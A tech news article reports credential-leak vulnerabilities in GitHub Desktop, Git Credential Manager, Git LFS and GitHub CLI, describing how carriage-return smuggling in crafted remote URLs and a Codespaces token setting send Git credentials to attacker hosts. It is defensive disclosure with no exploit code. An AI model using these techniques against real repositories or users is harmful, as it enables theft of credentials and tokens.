softare development

GitHub Desktop exposes credential leaks through a vulnerability in malicious remote URLs.

Multiple security vulnerabilities have been revealed in GitHub Desktop and other Git-related projects that, if exploited, could allow attackers to gain unauthorized access to a user’s Git credentials.

According to GMO Flatt security researcher Ry0taK, who identified the flaws, “Git uses the Git Credential Protocol to retrieve credentials from the credential helper. Due to improper message handling, numerous projects became susceptible to credential leaks in various ways,” he explained in an analysis published on Sunday.

The identified vulnerabilities are as follows:

  • CVE-2025-23040 (CVSS score: 6.6) – Maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop
  • CVE-2024-50338 (CVSS score: 7.4) – Carriage-return character in remote URL allows the malicious repository to leak credentials in Git Credential Manager
  • CVE-2024-53263 (CVSS score: 8.5) – Git LFS permits retrieval of credentials via crafted HTTP URLs
  • CVE-2024-53858 (CVSS score: 6.5) – Recursive repository cloning in GitHub CLI can leak authentication tokens to non-GitHub submodule hosts

Start Learning Cybersecurity

While the credential helper is designed to return credentials separated by the newline control character (“\n”), research has shown that GitHub Desktop is vulnerable to carriage return (“\r”) smuggling. By injecting this character into a crafted URL, an attacker can potentially leak credentials to an attacker-controlled host.

Hackers Inject Malicious Code in Chrome Extensions

“By using a maliciously crafted URL, it’s possible to cause the credential request from Git to be misinterpreted by GitHub Desktop, resulting in the credentials being sent to a different host than the one Git is communicating with, thus enabling secret exfiltration,” GitHub explained in an advisory.

A similar flaw was found in the Git Credential Manager NuGet package, where credentials can be exposed to unrelated hosts. Additionally, Git LFS was discovered to not check for embedded control characters, allowing for CRLF injection through crafted HTTP URLs.

The vulnerability in GitHub CLI exploits the fact that access tokens are configured to be sent to hosts other than github[.]com and ghe[.]com, as long as the environment variables GITHUB_ENTERPRISE_TOKEN, GH_ENTERPRISE_TOKEN, and GITHUB_TOKEN are set, and CODESPACES is enabled (set to “true”).

“While the enterprise-related variables are less common, the CODESPACES environment variable is always set to ‘true’ when running on GitHub Codespaces,” Ry0taK noted. “Thus, cloning a malicious repository in GitHub Codespaces using GitHub CLI will always leak the access token to the attacker’s hosts.”

Successful exploitation of these vulnerabilities could allow malicious third parties to use the leaked authentication tokens to access privileged resources.

Recent Posts

How Facial Recognition Software Works

Facial recognition technology is rapidly changing how we interact with devices, access services, and enhance…

1 day ago

Why Grok 4 is the AI Game-Changer You Need to Know

Move over ChatGPT, there's a new, significantly upgraded player causing a stir. xAI, Elon Musk's…

1 week ago

Cloudinary vs. AWS vs. ImageKit.io vs. Cloudflare

Choosing the right asset management service is vital. Cloudinary is frequently mentioned, but how does…

2 weeks ago

How to Integrate Cloudinary with PHP

Cloudinary is a powerful cloud-based media management platform that allows you to upload, store, manage,…

3 weeks ago

Trump Extends U.S. TikTok Sale Deadline to September 2025

In a surprising turn of events, former President Donald Trump announced on June 19, 2025,…

4 weeks ago

Master React Native Flexbox

Flexbox is a powerful layout system in React Native that allows developers to create responsive…

1 month ago